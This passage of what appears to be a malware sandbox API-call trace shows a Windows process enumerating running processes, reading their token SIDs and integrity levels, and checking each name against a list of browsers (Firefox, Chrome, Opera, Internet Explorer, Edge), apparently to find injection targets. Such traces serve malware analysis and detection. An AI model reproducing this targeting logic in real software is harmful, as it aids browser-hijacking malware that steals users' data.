(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x528 [0460.152] OpenProcessToken (in: ProcessHandle=0x528, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4f4) returned 1 [0460.152] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0460.152] GetLastError () returned 0x7a [0460.152] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0460.153] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0460.153] CloseHandle (hObject=0x4f4) returned 1 [0460.153] CloseHandle (hObject=0x528) returned 1 [0460.153] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0460.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x528 [0460.153] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376aa8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="# 0") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0460.153] OpenProcessToken (in: ProcessHandle=0x528, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4f4) returned 1 [0460.153] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0460.153] GetLastError () returned 0x7a [0460.153] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x19, TokenInformation=0x3d0d28, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x3d0d28, ReturnLength=0x20f7d8) returned 1 [0460.153] GetSidSubAuthorityCount (pSid=0x3d0d30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x3d0d31 [0460.153] GetSidSubAuthority (pSid=0x3d0d30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x3d0d38 [0460.153] CloseHandle (hObject=0x4f4) returned 1 [0460.153] CloseHandle (hObject=0x528) returned 1 [0460.153] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0460.153] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0460.153] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0460.153] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0460.153] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0460.153] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0460.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0460.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0460.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0460.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x528 [0460.154] OpenProcessToken (in: ProcessHandle=0x528, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4f4) returned 1 [0460.154] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0460.154] GetLastError () returned 0x7a [0460.154] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0460.154] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0460.154] CloseHandle (hObject=0x4f4) returned 1 [0460.154] CloseHandle (hObject=0x528) returned 1 [0460.154] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0460.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x528 [0460.154] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376e50, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="# 1") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0460.154] OpenProcessToken (in: ProcessHandle=0x528, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4f4) returned 1 [0460.154] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0460.154] GetLastError () returned 0x7a [0460.154] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x19, TokenInformation=0x3d0d28, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x3d0d28, ReturnLength=0x20f7d8) returned 1 [0460.154] GetSidSubAuthorityCount (pSid=0x3d0d30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x3d0d31 [0460.154] GetSidSubAuthority (pSid=0x3d0d30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x3d0d38 [0460.154] CloseHandle (hObject=0x4f4) returned 1 [0460.154] CloseHandle (hObject=0x528) returned 1 [0460.154] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0460.154] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0460.154] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0460.154] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0460.154] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0460.154] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0460.155] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0460.155] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0462.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa7e8) returned 0xc0000004 [0462.158] VirtualAlloc (lpAddress=0x0, dwSize=0xb7e8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0462.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb7e8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0462.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0462.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0462.159] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0462.160] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0462.160] GetLastError () returned 0x7a [0462.160] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0462.160] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0462.160] CloseHandle (hObject=0x3bc) returned 1 [0462.160] CloseHandle (hObject=0x5a4) returned 1 [0462.160] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0462.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0462.160] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x378028, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">H") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0462.160] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0462.160] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0462.160] GetLastError () returned 0x7a [0462.160] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0462.160] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0462.160] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0462.160] CloseHandle (hObject=0x3bc) returned 1 [0462.160] CloseHandle (hObject=0x5a4) returned 1 [0462.161] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0462.161] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0462.161] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0462.161] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0462.161] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0462.161] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0462.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0462.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0462.161] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0462.161] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0462.161] GetLastError () returned 0x7a [0462.161] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0462.161] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0462.161] CloseHandle (hObject=0x3bc) returned 1 [0462.161] CloseHandle (hObject=0x5a4) returned 1 [0462.161] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0462.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0462.161] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375da0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">I") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0462.161] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0462.162] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0462.162] GetLastError () returned 0x7a [0462.162] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0462.162] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0462.162] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0462.162] CloseHandle (hObject=0x3bc) returned 1 [0462.162] CloseHandle (hObject=0x5a4) returned 1 [0462.162] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0462.162] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0462.162] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0462.162] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0462.162] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0462.162] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0462.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0462.162] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0462.162] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0462.162] GetLastError () returned 0x7a [0462.162] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0462.162] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0462.162] CloseHandle (hObject=0x3bc) returned 1 [0462.162] CloseHandle (hObject=0x5a4) returned 1 [0462.162] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0462.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0462.162] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376560, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">J") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0462.163] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0462.163] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0462.163] GetLastError () returned 0x7a [0462.163] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0462.163] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0462.163] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0462.163] CloseHandle (hObject=0x3bc) returned 1 [0462.163] CloseHandle (hObject=0x5a4) returned 1 [0462.163] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0462.163] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0462.163] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0462.163] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0462.163] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0462.163] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0462.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0462.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0462.163] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0462.163] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0462.163] GetLastError () returned 0x7a [0462.163] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0462.163] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0462.163] CloseHandle (hObject=0x3bc) returned 1 [0462.163] CloseHandle (hObject=0x5a4) returned 1 [0462.163] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0462.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0462.163] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376ba8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">K") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0462.163] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0462.163] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0462.163] GetLastError () returned 0x7a [0462.163] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0462.164] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0462.164] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0462.164] CloseHandle (hObject=0x3bc) returned 1 [0462.164] CloseHandle (hObject=0x5a4) returned 1 [0462.164] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0462.164] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0462.164] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0462.164] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0462.164] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0462.164] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0462.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0462.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0462.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0462.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0462.164] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0462.164] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0462.164] GetLastError () returned 0x7a [0462.164] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0462.164] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0462.164] CloseHandle (hObject=0x3bc) returned 1 [0462.164] CloseHandle (hObject=0x5a4) returned 1 [0462.164] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0462.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0462.164] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376f50, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">L") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 